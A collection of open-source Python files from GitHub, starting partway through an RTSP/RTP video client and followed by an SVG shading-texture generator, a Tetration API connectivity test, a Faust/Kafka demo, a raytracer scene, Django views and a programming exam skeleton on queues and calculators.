packet\n\t\t\t\t\tif currFrameNbr < self.frameNbr:\n\t\t\t\t\t\tpacketSlow += 1\n\t\t\t\t\t# Update frame\n\t\t\t\t\tif currFrameNbr > self.frameNbr: \n\t\t\t\t\t\tself.frameNbr = currFrameNbr\n\t\t\t\t\t\tpayload = rtpPacket.getPayload()\n\t\t\t\t\t\tself.updateMovie(self.writeFrame(payload))\n\t\t\t\t\t\t# Count video data\n\t\t\t\t\t\tvideoData += len(payload)\n\t\t\t\t\t\tif self.frameNbr == 500:\n\t\t\t\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\t# Stop listening if request is PAUSE or TEARDOWN\n\t\t\t\tif self.playEvent.isSet():\n\t\t\t\t\tbreak\n\t\t\t\tif self.teardownAcked:\n\t\t\t\t\tself.rtpSocket.shutdown(socket.SHUT_RDWR)\n\t\t\t\t\tself.rtpSocket.close()\n\t\t\t\t\tbreak\n\t\tend = time()\n\t\t# Calc and print data transmission parameters\n\t\tprint(\"\\n===============================\")\n\t\tprint(f\"RTP Packet Loss Rate = {packetLoss-packetSlow}/{self.frameNbr} = {100 * (packetLoss-packetSlow)/self.frameNbr} %\")\n\t\tprint(f\"RTP Packet Slow Rate = {packetSlow}/{self.frameNbr} = {100 * packetSlow /self.frameNbr} %\")\n\t\tprint(f\"Video data rate = {videoData}/{end - start} = {videoData/(end - start)} bytes/sec\")\n\t\tprint(\"===============================\\n\")\n\t\t\t\t\t\t\t\t\n\tdef writeFrame(self, data):\n\t\t\"\"\"Write the received frame to a temp image file. Return the image file.\"\"\"\n\t\tcachename = CACHE_FILE_NAME + str(self.sessionId) + CACHE_FILE_EXT\n\t\tfile = open(cachename, \"wb\")\n\t\tfile.write(data)\n\t\tfile.close()\n\t\treturn cachename\n\t\n\tdef updateMovie(self, imageFile):\n\t\t\"\"\"Update the image file as video frame in the GUI.\"\"\"\n\t\tphoto = ImageTk.PhotoImage(Image.open(imageFile)) \n\t\tself.label.configure(image = photo, height=288)\n\t\tself.label.image = photo\n\t\t\n\tdef connectToServer(self):\n\t\t\"\"\"Connect to the Server. Start a new RTSP/TCP session.\"\"\"\n\t\tself.rtspSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\ttry:\n\t\t\tself.rtspSocket.connect((self.serverAddr, self.serverPort))\n\t\texcept:\n\t\t\ttkinter.messagebox.showwarning(f\"Connect to {self.serverAddr} at port {self.serverPort} failed!\")\n\t\n\tdef sendRtspRequest(self, requestCode):\n\t\t\"\"\"Send RTSP request to the server.\"\"\"\t\n\t\trequest = \"\"\n\t\tself.rtspSeq += 1\n\t\tif requestCode == Client.SETUP:\n\t\t\trequest += f\"SETUP {self.fileName} RTSP/1.0\\n\"\n\t\t\trequest += f\"CSeq: {self.rtspSeq}\\n\"\n\t\t\trequest += f\"Transport: RTP/UDP; client_port= {self.rtpPort}\\n\"\n\t\telse:\n\t\t\tif requestCode == Client.PLAY:\n\t\t\t\trequest += \"PLAY\"\n\t\t\tif requestCode == Client.PAUSE:\n\t\t\t\trequest += \"PAUSE\"\n\t\t\tif requestCode == Client.TEARDOWN:\n\t\t\t\trequest += \"TEARDOWN\"\n\t\t\trequest += f\" {self.fileName} RTSP/1.0\\n\"\n\t\t\trequest += f\"CSeq: {self.rtspSeq}\\n\"\n\t\t\trequest += f\"Session: {self.sessionId}\\n\"\n\t\tself.requestSent = requestCode\n\t\tself.rtspSocket.send(request.encode())\n\t\n\tdef recvRtspReply(self):\n\t\t\"\"\"Receive RTSP reply from the server.\"\"\"\n\t\twhile True:\n\t\t\t# Stop listening if teardown\n\t\t\tif self.teardownAcked:\n\t\t\t\tself.rtspSocket.shutdown(socket.SHUT_RDWR)\n\t\t\t\tself.rtspSocket.close()\n\t\t\t\tbreak\n\t\t\t# Recv reply and process\n\t\t\tdata = self.rtspSocket.recv(256)\n\t\t\tif data: \n\t\t\t\tself.parseRtspReply(data.decode())\n\t\t\t\t\n\tdef parseRtspReply(self, data: str):\n\t\t\"\"\"Parse the RTSP reply from the server.\"\"\"\n\t\tresponse = data.split('\\n')\n\t\tcode = int(response[0].split(' ')[1])\n\t\t# Check status code\n\t\tif code == 200:\n\t\t\tseq = int(response[1].split(' ')[1])\n\t\t\t# Check sequence number\n\t\t\tif seq == self.rtspSeq:\n\t\t\t\tsession = int(response[2].split(' ')[1])\n\t\t\t\t# If requestSend is SETUP, update session ID\n\t\t\t\tif self.requestSent == Client.SETUP:\n\t\t\t\t\tself.sessionId = session\n\t\t\t\t\tself.state = Client.READY\n\t\t\t\t\tself.openRtpPort()\n\t\t\t\telse:\n\t\t\t\t\t# Else check session ID and process the reply\n\t\t\t\t\tif self.sessionId != session: return\n\t\t\t\t\tif self.requestSent == Client.PLAY:\n\t\t\t\t\t\tself.state = Client.PLAYING\n\t\t\t\t\telif self.requestSent == Client.PAUSE:\n\t\t\t\t\t\tself.state = Client.READY\n\t\t\t\t\telif self.requestSent == Client.TEARDOWN:\n\t\t\t\t\t\tself.state = Client.INIT\n\t\t\t\t\t\tself.teardownAcked = 1\n\t\telif code == 404:\n\t\t\ttkinter.messagebox.showwarning('File not found!')\n\t\telif code == 500: \n\t\t\ttkinter.messagebox.showwarning('Connection error!')\n\t\t\n\tdef openRtpPort(self):\n\t\t\"\"\"Open RTP socket binded to a specified port.\"\"\"\n\t\t# Create a new datagram socket to receive RTP packets from the server\n\t\tself.rtpSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\t# Set the timeout value of the socket to 0.5sec\n\t\tself.rtpSocket.settimeout(0.5)\n\t\ttry:\n\t\t\tself.rtpSocket.bind(('', self.rtpPort))\n\t\texcept:\n\t\t\ttkinter.messagebox.showwarning(f\"Bind tp port {self.rtpPort} faild!\")\n\n\tdef handler(self):\n\t\t\"\"\"Handler on explicitly closing the GUI window.\"\"\"\n\t\t# Pause Movie if it is playing\n\t\tself.pauseMovie()\n\t\t# Ask user again\n\t\tif tkinter.messagebox.askokcancel(\"Quit?\", \"Are you sure you want to quit?\"):\n\t\t\t# Remove all cache file\n\t\t\tfor file in glob.iglob(CACHE_FILE_NAME+'*'+CACHE_FILE_EXT):\n\t\t\t\tos.remove(file)\n\t\t\t# Teardown session\n\t\t\tself.exitClient()\n\t\t\t# Close app\n\t\t\tself.master.destroy()\n\t\telse: \n\t\t\t# When the user presses cancel, resume playing.\n\t\t\tself.playMovie()","repo_name":"hoale0231/RTSP-RTP-Media_Stream","sub_path":"Normal/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":8410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"26023447735","text":"import numpy as np\nfrom scipy.ndimage import imread\nfrom math import pi, sqrt, sin, cos\nimport subprocess\nimport pickle\n\nimport svgwrite as svg\n\nfrom random import random\n\nfrom shapely import geometry as geom\nfrom shapely import affinity\n\nfrom itertools import product\n\ndef in_image(x,y, w,h):\n return x + w/2 < w and \\\n x + w/2 >= 0 and \\\n y + h/2 < h and \\\n y + h/2 >= 0\n\n\ndef spiral(points, step_along_spiral, step_out_per_rot, max_r):\n dr = step_out_per_rot / (2*pi)\n r = step_along_spiral\n a = r / dr\n x,y = 0,0\n npoints = 0\n while r < max_r:\n if points.shape[0] <= npoints:\n points.resize((npoints + 100000, points.shape[1]), refcheck=False)\n #print('Resize to %s points for radius %s/%s'%(points.shape[0], r, max_r))\n\n a += step_along_spiral / r\n r = dr * a\n\n x = r * np.cos(a)\n y = r * np.sin(a)\n\n points[npoints,0] = x\n points[npoints,1] = y\n\n npoints += 1\n\n #print('%s points'%npoints)\n points.resize((npoints, points.shape[1]), refcheck=False)\n\ndef spiral_shade(step, w,h):\n points = np.empty([0,2], dtype='float64')\n spiral(points, 2, step + 0.5, sqrt(2*(max(w,h)/2)**2))\n #print(step, points.shape)\n points[:,:] += [w/2, h/2]\n if points.shape[0] < 2:\n return geom.MultiLineString([])\n lines = geom.asLineString(points)#.intersection(geom.box(0,0,w,h))\n if isinstance(lines, geom.LineString):\n return geom.MultiLineString([lines])\n else:\n return lines\n\ndef many_spirals(step, w,h):\n \"\"\"Step range should be 0-1 but internally it's 1-0 because more spiral = darker\"\"\"\n spacing = 100\n points = np.empty([0,2], dtype='float64')\n spiral(points, 0.5, 2, (1-step) * spacing)\n if points.shape[0] < 2: return geom.MultiLineString([])\n little_spiral = geom.asLineString(points)\n lines = []\n print((w/spacing) * (h/spacing), 'spirals')\n for x,y in product(range(int(w/spacing)), range(int(h/spacing))):\n lines.append(affinity.translate(little_spiral, x*spacing, y*spacing))\n return geom.MultiLineString(lines)\n\ndef random_line(length, w,h):\n x = random()*w\n y = random()*h\n p1 = (x,y)\n a = random() * 2*pi\n p2 = (x + length*cos(a), y + length*sin(a))\n return geom.LineString([p1, p2])\n\ndef random_line(length, w,h):\n return geom.LineString([(random()*w, random()*h), (random()*w, random()*h)])\n\ndef random_lines(grey, w,h):\n black_lines_per_area = 0.02\n increase_area = 1.1\n woff, hoff = w*(1-increase_area) / 2, h*(1-increase_area) / 2\n w *= increase_area\n h *= increase_area\n\n nlines = 1 + int(black_lines_per_area * w*h * (1 - grey / 256.))\n length = sqrt(w**2 + h**2)\n return geom.MultiLineString([affinity.translate(random_line(length, w, h), woff, hoff)\n for _ in range(nlines)])\n\ndef diagonal_lines(step, w,h):\n if step == 0: return geom.MultiLineString([])\n x = max(w,h)\n nlines = int(2 * x / step)\n\n lines = []\n for i in range(nlines):\n if i*step <= x:\n lines.append(geom.LineString([(i*step,0), (0,i*step)]))\n else:\n lines.append(geom.LineString([(i*step-x,x), (x,i*step-x)]))\n return geom.MultiLineString(lines)\n\n\ndef hatch_shade(step, w,h):\n if step == 0: return geom.MultiLineString([])\n x = max(w,h)\n nlines = 2 * x / step # you have to go twice as far to fill the whole square with hash\n\n lines = []\n xh = x / 2.\n for i in range(int(nlines)):\n if i*step <= x:\n line = geom.LineString([(i*step,0), (0,i*step)])\n else:\n line = geom.LineString([(i*step-x,x), (x,i*step-x)])\n lines.append(line)\n\n x1,y1,x2,y2 = *line.coords[0], *line.coords[1]\n x1 = (xh*2-x1)\n x2 = (xh*2-x2)\n line = geom.LineString([(x1,y1), (x2,y2)])\n\n lines.append(line)\n\n return geom.MultiLineString(lines)\n\ndef generate_textures(greys, w,h):\n return {g: many_spirals(v, w,h) for g,v in zip(greys, find_inputs_for_greys(greys, many_spirals))}\n return {g: spiral_shade(v, w,h) for g,v in zip(greys, find_inputs_for_greys(greys, spiral_shade))}\n return {g: hatch_shade(v, w,h) for g,v in zip(greys, find_inputs_for_greys(greys, hatch_shade))}\n return {g: diagonal_lines(v, w,h) for g,v in zip(greys, find_inputs_for_greys(greys, diagonal_lines))}\n\ndef shade_test():\n dwg = svg.Drawing('grey_test.svg')\n nsteps = 10\n x = 500\n for i in range(nsteps):\n grey = (i+1) * 256 / nsteps\n box = geom.box(0, i * x/nsteps, x/nsteps, (i+1) * x/nsteps)\n #lines = affinity.translate(diagonal_lines(grey, x/nsteps, x/nsteps), x/nsteps, i*x/nsteps)\n lines = affinity.translate(hatching(grey, x/nsteps, x/nsteps), x/nsteps, i*x/nsteps)\n\n svgbox = svg.shapes.Polygon(box.exterior.coords)\n svgbox.fill('rgb(%i,%i,%i)'%(grey,grey,grey))\n dwg.add(svgbox)\n for line in lines:\n svgline = svg.shapes.Line(line.coords[0], line.coords[1])\n svgline.fill('none')\n svgline.stroke('black', width=1.00)\n dwg.add(svgline)\n\n dwg.viewbox(minx=0, miny=0, width=2*x/nsteps, height=x)\n dwg.save()\n\n\ngrey_shade_cache = {}\ngrey_shade_cache_filename = 'grey_cache.pickle'\ndef init_texture_data_cache():\n global grey_shade_cache\n try:\n with open(grey_shade_cache_filename, 'rb') as f:\n grey_shade_cache = pickle.load(f)\n except FileNotFoundError:\n pass\n\ndef save_texture_data_cache():\n global grey_shade_cache\n with open(grey_shade_cache_filename, 'wb') as f:\n pickle.dump(grey_shade_cache, f, pickle.HIGHEST_PROTOCOL)\n\ndef test_shade_grey(shade_fn, inpt):\n global grey_shade_cache\n\n if inpt in grey_shade_cache:\n return grey_shade_cache[inpt]\n\n lines = shade_fn(inpt, 100,100)\n\n filename = 'temp_grey_test.svg'\n dwg = svg.Drawing(filename)\n for line in lines:\n svgline = svg.shapes.Polyline(line.coords)\n svgline.fill('none')\n svgline.stroke('black', width=1.00)\n dwg.add(svgline)\n\n dwg.viewbox(minx=0, miny=0, width=100, height=100)\n dwg.save()\n\n render_svg(filename)\n image = imread(filename + '.png')\n grey = np.sum(image) / np.product(image.shape)\n\n grey_shade_cache[inpt] = grey\n return grey\n\n\ndef within(x, tolerance, y):\n return x - tolerance < y and x + tolerance > y\n\ndef calibrate_grey(target_grey, shade_fn, tolerance=5):\n lo,hi = 0, 1#000\n mid = lo + (hi - lo) / 2\n\n hi_grey = test_shade_grey(shade_fn, hi)\n mid_grey = test_shade_grey(shade_fn, mid)\n lo_grey = test_shade_grey(shade_fn, lo)\n\n print('----', target_grey, '----')\n while not within(target_grey, tolerance, mid_grey):\n if mid_grey > target_grey:\n hi = mid\n else:\n lo = mid\n\n mid = lo + (hi - lo) / 2\n hi_grey = test_shade_grey(shade_fn, hi)\n mid_grey = test_shade_grey(shade_fn, mid)\n lo_grey = test_shade_grey(shade_fn, lo)\n print(mid, mid_grey)\n\n print(target_grey, mid)\n save_texture_data_cache()\n return mid\n\ndef render_svg(filename, width=200):\n subprocess.run(['/usr/bin/inkscape', '-z', '-f', filename, '-w', str(width), '-b', 'white', '-e', filename + '.png'], stdout=subprocess.DEVNULL)\n subprocess.run(['/usr/bin/convert', '-type', 'Grayscale', filename + '.png', filename + '.png'], stdout=subprocess.DEVNULL)\n\ndef find_inputs_for_greys(greys, shade_fn, tolerance=2):\n calculate_normalization_scale(shade_fn)\n print(list(zip(greys, [texture_data[shade_fn][\"normalization_scale\"](grey) for grey in greys])))\n return [calibrate_grey(texture_data[shade_fn][\"normalization_scale\"](grey), shade_fn, tolerance) for grey in greys] \n\ndef calculate_normalization_scale(shade_fn):\n gmin = test_shade_grey(shade_fn, texture_data[shade_fn][\"calibration_range\"][0])\n gmax = test_shade_grey(shade_fn, texture_data[shade_fn][\"calibration_range\"][1])\n gmin, gmax = min(gmax,gmin), max(gmax,gmin)\n print(shade_fn.__name__, gmax, gmin)\n texture_data[shade_fn][\"normalization_scale\"] = lambda x: gmin + (x / 255.) * (gmax - gmin)\n\ndef scales():\n pass\n\ndef id(x): return x\n\ntexture_data = {\n diagonal_lines : {\"calibration_range\": (0,100), \"normalization_scale\": id },\n hatch_shade : {\"calibration_range\": (0,100), \"normalization_scale\": id},\n spiral_shade : {\"calibration_range\": (0,100), \"normalization_scale\": id},\n many_spirals : {\"calibration_range\": (0,1), \"normalization_scale\": id},\n scales : {\"calibration_range\": (0,100), \"normalization_scale\": id},\n}\n","repo_name":"charlieb/shading","sub_path":"shade_textures.py","file_name":"shade_textures.py","file_ext":"py","file_size_in_byte":8618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73070683247","text":"import json\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nfrom tetpyclient import RestClient\n\nimport environment as env\n\n# Disable insecure request warnings\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n# FUNCTIONS\n\n# Test Connectivity to Tetration API\n\n\ndef tetration_test(\n host=env.TET.get(\"host\"),\n api_key=env.TET_API_KEY,\n api_sec=env.TET_SEC\n):\n\n # Build URL\n url = f\"https://{host}\"\n\n restclient = RestClient(url,\n api_key=api_key,\n api_secret=api_sec,\n verify=True)\n\n # HTTP Get Request\n response = restclient.get(\"/applications\")\n\n # If response code is 200, Test Successful\n if response.status_code == 200:\n print(\"Test Successful....Woo Hoo!\")\n\n # return applications\n\n # If response code is anything but 200, print error message with response code\n else:\n print(f\"Test Failed....DOE!\"\n f\"\\nError Code {response.status_code}\")\n\n\n# If this script is the \"main\" script, run...\n\nif __name__ == \"__main__\":\n\n # Run Test\n results = tetration_test()\n\n","repo_name":"CiscoDevNet/CiscoSecurityAPIsStartNow","sub_path":"Tetration/tetration_test.py","file_name":"tetration_test.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"2"} +{"seq_id":"12101847608","text":"import haydi as hd\n\n\ndef test_iterator_first():\n assert 0 == hd.Range(10).first(-1).run()\n assert -1 == hd.Range(0).first(-1).run()\n\n\ndef test_iterator_reduce():\n expected = sum(range(10))\n result = hd.Range(10).reduce(lambda x, y: x + y).run()\n assert expected == result\n\n expected = max(range(10))\n result = hd.Range(10).reduce(max).run()\n assert expected == result\n","repo_name":"spirali/haydi","sub_path":"tests/test_iterator.py","file_name":"test_iterator.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"33183668216","text":"from typing import List, Optional, AsyncIterable\nimport random\nimport uuid\n\nimport faust\nfrom kafka import KafkaProducer\n\napp = faust.App(\"demo\")\nproducer = KafkaProducer()\n\nclass CustomerRecord(faust.Record, serializer=\"json\"):\n msg_id: uuid.UUID\n customer: str\n amount: int\n number_of_purchases: int\n note: Optional[str]\n\ncustomer_topic = app.topic(\"customer_topic\", value_type=CustomerRecord)\n\ncompleted_customer_topic = app.topic(\"completed_customer_topic\", value_type=CustomerRecord)\n\ndef ring_up_customer(customer):\n customer.number_of_purchases += 1\n purchase_price = random.randint(1, 100)\n customer.amount += purchase_price\n print(f\"{customer.customer} spent {purchase_price}\")\n\ndef customer_is_done(customer):\n return (customer.number_of_purchases > 100\n or customer.amount > 5000\n or random.randint(1, 100) == 1)\n\n@app.agent(customer_topic, concurrency=20)\nasync def purchase_processor(customers: AsyncIterable[CustomerRecord]):\n \"\"\"Process customer purchases.\"\"\"\n async for customer in customers:\n ring_up_customer(customer)\n if customer_is_done(customer):\n print(f\"{customer.customer} spent {customer.amount / customer.number_of_purchases} on average.\")\n print(customer)\n producer.send(\"completed_customer_topic\", customer.dumps())\n else:\n producer.send(\"customer_topic\", customer.dumps())\n","repo_name":"BWStearns/faust_intro","sub_path":"app/recursive_demo.py","file_name":"recursive_demo.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"26556662137","text":"from gl import *\r\nfrom texture import Texture\r\nfrom obj import ObjReader\r\nfrom envmap import Envmap\r\nfrom sphere import *\r\n\r\nif __name__ == '__main__':\r\n brick = Material(diffuse = color(0.8, 0.25, 0.25 ), spec = 16)\r\n stone = Material(diffuse = color(0.4, 0.4, 0.4 ), spec = 32)\r\n mirror = Material(spec = 64, matType = REFLECTIVE)\r\n glass = Material(spec = 64, ior = 1.5, matType= TRANSPARENT) \r\n\r\n EscritorioMAt = Material(texture = Texture('./Utils/madera22.bmp'))\r\n Mantel = Material(texture = Texture('./Utils/mantel.bmp'))\r\n GoldLampMaterial = Material(texture = Texture('./Utils/lamp.bmp'))\r\n\r\n DiscoBall = Material(texture = Texture('./Utils/discob.bmp'))\r\n\r\n speakers = Material(texture = Texture('./Utils/bass2.bmp'))\r\n MaterialPared = Material(texture = Texture('./Utils/pared.bmp'))\r\n\r\n\r\n width = 1920\r\n height = 1080\r\n r = Raytracer(width,height)\r\n r.glClearColor(0.2, 0.6, 0.8)\r\n r.glClear()\r\n\r\n r.envmap = Envmap('./Utils/dark.bmp')\r\n\r\n\r\n # Lights\r\n r.pointLights.append( PointLight(position = V3(-3, -1.225, -10), intensity = 0.25)) # util\r\n r.pointLights.append( PointLight(position = V3(-3, -1.225, -11), intensity = 0.07)) # Window Efect\r\n r.ambientLight = AmbientLight(strength = 0.35)\r\n\r\n # Desk\r\n r.scene.append( AABB(V3(0, -3, -10), V3(10, 0.1, 5) , EscritorioMAt, 'box' ) )\r\n r.scene.append( AABB(V3(0, -2.9, -10), V3(9, 0.08, 4) , Mantel, 'box' ) )\r\n r.scene.append( AABB(V3(-5, -5.45, -10), V3(0.1, 5, 5) , EscritorioMAt, 'box' ) )\r\n r.scene.append( AABB(V3(5, -5.45, -10), V3(0.1, 5, 5) , EscritorioMAt, 'box' ) )\r\n\r\n # util\r\n r.scene.append( AABB(V3(-5.75, -1.75, -10), V3(1.5, 3.5, 1.25) , GoldLampMaterial, 'box' ) )\r\n r.scene.append( AABB(V3(-5.75, -1, -10), V3(2.75, 1.25, 1.25) , GoldLampMaterial, 'box' ) )\r\n r.scene.append( AABB(V3(-5, -1.2, -10), V3(1, 0.2, 1) , GoldLampMaterial, 'lamp' ) )\r\n \r\n # Ball\r\n r.scene.append( Sphere(V3( 0, 3.75, -10), 1, DiscoBall))\r\n\r\n #speakers\r\n r.scene.append( AABB(V3(3, -2, -10), V3(1, 0.85, 1.5) , speakers, 'box' ) )\r\n r.scene.append( AABB(V3(4, -2, -10), V3(1, 0.85, 1.5) , speakers, 'box' ) )\r\n r.scene.append( AABB(V3(3, -1.5, -10), V3(1, 0.85, 1.5) , speakers, 'box' ) )\r\n r.scene.append( AABB(V3(4, -1.5, -10), V3(1, 0.85, 1.5) , speakers, 'box' ) )\r\n \r\n # Room\r\n r.scene.append( AABB(V3(0,0,-12), V3(15,10,10), MaterialPared, 'room') )\r\n r.scene.append( AABB(V3(-5.58,0,-17), V3(3.75,10,0.2), MaterialPared, 'box') )\r\n r.scene.append( AABB(V3(5.58,0,-17), V3(3.75,10,0.2), MaterialPared, 'box') )\r\n r.scene.append( AABB(V3(0,-3.5,-17), V3(7.30,3,0.2), MaterialPared, 'box') )\r\n r.scene.append( AABB(V3(0,1.5,-17), V3(7.30,7,0.2), glass, 'box') ) # Window\r\n\r\n r.rtRender()\r\n\r\n r.glFinish('out.bmp')","repo_name":"AndresQuinto5/Proyecto-2-Raytracer","sub_path":"Raytracer.py","file_name":"Raytracer.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22255164017","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.db.models import Q\nfrom susanowo.models.ttodo import TTodo\nfrom susanowo.forms.loginModelForm import MUserModelForm\nfrom omoikane.models import MUser\nimport datetime\n\n# Create your views here.\ndef login(request):\n if request.method == 'GET':\n user_id = request.session.get('LOGIN_USER_ID')\n form = MUserModelForm(request.GET or None)\n context = {\n 'form': form\n }\n\n if user_id:\n return redirect('/susanowo/index')\n\n return render(request, 'susanowo/login.html', context)\n else:\n form = MUserModelForm(request.POST)\n if not form.is_valid():\n context = {\n 'form': form\n }\n return render(request, 'susanowo/login.html', context)\n return redirect('/susanowo/index')\n\ndef requestLogin(request):\n\n return HttpResponse('Hello susanowo')\n\ndef index(request):\n d = {\n 'today': datetime.datetime.today().strftime(\"%Y/%m/%d\"),\n 'ttodos': TTodo.objects.filter(~Q(category='07') & ~Q(category='08')).order_by('deleted','category','delivery_date'),\n }\n\n return render(request, 'susanowo/index.html', d)\n\ndef modstatus(request):\n if request.method == 'POST':\n id = request.POST.get('param_id')\n complete = request.POST.get('param_complete')\n delete = request.POST.get('param_delete')\n\n t_todo = TTodo.objects.get(id=id)\n t_todo.completed = complete\n t_todo.deleted = delete\n t_todo.save()\n\n return HttpResponse(t_todo)\n","repo_name":"Ryuk-Togo/amenotorifune","sub_path":"susanowo/views/indexviews.py","file_name":"indexviews.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"15114171567","text":"EXAM_ID = '' # Enter the ID number given when you registered for the exam\nEMAIL = '' # Enter your contact email address\n\n\n\"\"\"***************\n *** TASK A1 ***\n ***************\"\"\"\n\n\ndef calculator_int():\n \"\"\"Modify calculator.py so that it has a function\n which removes decimals.\n Leave this method as is.\"\"\"\n\n import calculator as c\n\n r1 = c.run('int(2.8)') # Expected value: 2\n r2 = c.run('int(-4.69)') # Expected value: -4\n r3 = c.run('int(-.9)') # Expected value: 0\n\n return r1, r2, r3\n\n\n\"\"\"***************\n *** TASK A2 ***\n ***************\"\"\"\n\n\ndef calculator_factor():\n \"\"\"Modify calculator.py so that it can handle\n factorials.\n Leave this method as is.\"\"\"\n\n import calculator as c\n\n r1 = c.run('0!') # Expected value: 1\n r2 = c.run('1!') # Expected value: 1\n r3 = c.run('2!') # Expected value: 2.0\n r4 = c.run('3!') # Expected value: 6.0\n r5 = c.run('exp(3!) + 2!') # Expected value: 405.4287934927351\n r6 = c.run('2.5!') # Expected value: Error: Illegal argument to factorial: 2.5\n r7 = c.run('-1!') # Expected value: -1\n r8 = c.run('(-1)!') # Expected value: Error: Illegal argument to factorial: -1.0\n\n return r1, r2, r3, r4, r5, r6, r7, r8\n\n\n\"\"\"***************\n *** TASK A3 ***\n ***************\"\"\"\n\n\ndef qlist_enqueue():\n \"\"\"Modify Qlist.py so that a value can be queued.\n Leave this method as is.\"\"\"\n\n from Qlist import Queue\n\n q = Queue()\n\n for x in [6, 4, 6, 9, 4]:\n q.enqueue(x)\n\n return q\n\n\n\"\"\"***************\n *** TASK A4 ***\n ***************\"\"\"\n\n\ndef qlist_dequeue():\n \"\"\"Modify Qlist.py so that a value can be\n removed and returned.\n Leave this method as is.\"\"\"\n\n from Qlist import Queue\n\n q = Queue()\n l = [2, 8, 2, 7, 8, 4, 9, 2]\n r = []\n\n for x in l:\n q.enqueue(x)\n\n for _ in range(int(len(l) / 2)):\n r.append(q.dequeue())\n\n return r\n\n\n\"\"\"***************\n *** TASK A5 ***\n ***************\"\"\"\n\n\ndef operator_overload():\n \"\"\"Modify Qlist.py so that two queues can\n be added using the + sign to create\n a third queue.\n Leave this method as is.\"\"\"\n\n from Qlist import Queue\n\n q1 = Queue()\n q2 = Queue()\n\n for x in [5, 23, 2, 31]:\n q1.enqueue(x)\n\n for x in [9, 5, 56, 7]:\n q2.enqueue(x)\n\n try:\n q3 = q1 + q2\n except TypeError:\n q3 = None\n\n return q3\n\n\n\"\"\"***************\n *** TASK A6 ***\n ***************\"\"\"\n\n\ndef smallest_in_list():\n \"\"\"Modify PQlist.py so that the smallest\n item in the list is returned.\n Leave this method as is.\"\"\"\n\n from PQlist import PQlist\n\n pq = PQlist()\n for x in [2, 5, 3, 7, 2, 3]:\n pq.enqueue(x)\n\n return pq.smallest()\n\n\n\"\"\"***************\n *** TASK A7 ***\n ***************\"\"\"\n\n\ndef copy_list():\n \"\"\"Modify PQlist.py so that it can\n produce a copy of itself.\n Leave this method as is.\"\"\"\n\n from PQlist import PQlist\n\n pq = PQlist()\n for x in [5, 9, 3, 8, 5, 7]:\n pq.enqueue(x)\n\n return pq.copy()\n\n\n\"\"\"***************\n *** TASK A8 ***\n ***************\"\"\"\n\n\ndef pqlist_complexity_answer():\n \"\"\"Write your answer to the question in Task A8 in\n in the string being returned.\"\"\"\n\n return ''\n\n\n\"\"\"***************\n *** TASK A9 ***\n ***************\"\"\"\n\n\ndef pqbst_enqueue():\n \"\"\"Modify PQbst.py so that a value can be queued.\n Leave this method as is.\"\"\"\n\n from PQbst import PQbst\n\n pq = PQbst()\n l = [4, 8, 4, 10, 7, 4, 8, 1]\n\n for x in l:\n pq.enqueue(x)\n\n return pq\n\n\n\"\"\"****************\n *** TASK A10 ***\n ****************\"\"\"\n\n\ndef fib(n):\n \"\"\"Feel free to modify this method\n if you find it necessary in order\n to complete this task.\"\"\"\n\n if n <= 1:\n return n\n else:\n return fib(n - 1) + fib(n - 2)\n\n\ndef multi_fib(fr=30, to=38):\n \"\"\"Run parallel calls to to the fib method\n and return a dictionary object.\"\"\"\n\n pass # Remove the pass statement and enter your code here\n\n\n\"\"\"***************\n *** TASK B1 ***\n ***************\"\"\"\n\n\ndef print_pq():\n \"\"\"Make the method run correctly\"\"\"\n\n from PQlist import PQlist\n\n pq = PQlist()\n\n for x in [2, 5, 3, 7, 2, 3]:\n pq.enqueue(x)\n\n result = ''\n\n try:\n for x in pq:\n result += f'{x} '\n except TypeError:\n result = None\n\n return result\n\n\n\"\"\"***************\n *** TASK B2 ***\n ***************\"\"\"\n\n\ndef letter_combo(s, l1, l2):\n \"\"\"Recursively calculate and return\n the number of times l1 directly\n precedes l2 in the given string\"\"\"\n\n pass # Remove the pass statement and enter your code here\n\n\n\"\"\"***************\n *** TASK B3 ***\n ***************\"\"\"\n\n\ndef pqbst_dequeue():\n \"\"\"Modify PQbst.py so that a value can be queued.\n Leave this method as is\"\"\"\n\n from PQbst import PQbst\n\n pq = PQbst()\n l = [6, 7, 12, 6, 1, 18, 9, 6, 5]\n for x in l:\n pq.enqueue(x)\n\n x = 1\n while x <= 5:\n pq.dequeue()\n x += 1\n\n return pq\n\n\n\"\"\"***************\n *** TASK B4 ***\n ***************\"\"\"\n\n\ndef pqbst_complexity_answer():\n \"\"\"Write your answer to the question in Task B4 in\n in the string being returned.\"\"\"\n\n return ''\n\n\n\"\"\"***************\n *** TASK B5 ***\n ***************\"\"\"\n\n\ndef get_info(index):\n \"\"\"This method opens the peeps.json file and returns\n the about info of the customer of the index given.\n Leave this method as is.\"\"\"\n\n import json\n\n with open('peeps.json') as f:\n data = json.load(f)\n return data[index]['about']\n\n\ndef worker(data):\n \"\"\"Employ this worker in your parallel\n execution if you need to, but do not add\n input arguments to this method.\"\"\"\n\n pass # Remove the pass statement and enter your code here\n\n\ndef calculate_occurrences(indexes, l1, l2):\n \"\"\"Run each index concurrently.\n Return a total of occurrences\n found in the given customer's\n about info from get_info.\"\"\"\n\n pass # Remove the pass statement and enter your code here\n\n\n\"\"\"************************************\n *** Run and test your code below ***\n 